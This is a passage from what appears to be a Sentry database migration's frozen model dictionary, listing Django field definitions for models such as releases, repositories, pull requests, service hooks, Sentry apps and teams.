'auto_assignment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectredirect': {
'Meta': {'unique_together': "(('organization', 'redirect_slug'),)", 'object_name': 'ProjectRedirect', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'redirect_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectSymCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.promptsactivity': {
'Meta': {'unique_together': "(('user', 'feature', 'organization_id', 'project_id'),)", 'object_name': 'PromptsActivity', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'), ('organization_id', 'merge_commit_sha'))"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.pullrequestcommit': {
'Meta': {'unique_together': "(('pull_request', 'commit'),)", 'object_name': 'PullRequestCommit', 'db_table': "'sentry_pullrequest_commit'", 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'pull_request': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.PullRequest']"})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent', 'index_together': '()'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.recentsearch': {
'Meta': {'unique_together': "(('user', 'organization', 'type', 'query_hash'),)", 'object_name': 'RecentSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'query_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.relay': {
'Meta': {'unique_together': '()', 'object_name': 'Relay', 'index_together': '()'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'relay_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release', 'index_together': '()'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization', 'release', 'environment'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'", 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile', 'index_together': "(('release', 'name'),)"},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository', 'index_together': '()'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport', 'index_together': '()'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'unique_together': '()', 'object_name': 'Rule', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'), ('organization', 'owner', 'type'))", 'object_name': 'SavedSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_global': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion', 'index_together': '()'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'a426ce10c7824ca2a31b88c01cf51105'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'unique_together': '()', 'object_name': 'ScheduledJob', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.sentryapp': {
'Meta': {'unique_together': '()', 'object_name': 'SentryApp', 'index_together': '()'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiApplication']"}),
'author': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_alertable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.TextField', [], {}),
'overview': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'owned_sentry_apps'", 'to': "orm['sentry.Organization']"}),
'proxy_user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.User']"}),
'redirect_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'95221a10-3d96-4af7-8670-be0f643dd7a1'", 'max_length': '64'}),
'webhook_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.sentryappavatar': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.SentryApp']"})
},
'sentry.sentryappcomponent': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppComponent', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'components'", 'to': "orm['sentry.SentryApp']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'})
},
'sentry.sentryappinstallation': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppInstallation', 'index_together': '()'},
'api_grant': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiGrant']"}),
'api_token': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiToken']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_app_installations'", 'to': "orm['sentry.Organization']"}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'installations'", 'to': "orm['sentry.SentryApp']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'c025a308-74d1-4b11-95f4-f74b0dba0a37'", 'max_length': '64'})
},
'sentry.servicehook': {
'Meta': {'unique_together': '()', 'object_name': 'ServiceHook', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'351f827fb83b47d2b3d4c8a8a379cc632e91af06c5d44946abd9396a33877cc8'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.servicehookproject': {
'Meta': {'unique_together': "(('service_hook', 'project_id'),)", 'object_name': 'ServiceHookProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'service_hook': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ServiceHook']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teamavatar': {
'Meta': {'unique_together': '()', 'object_name': 'TeamAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Team']"})
},
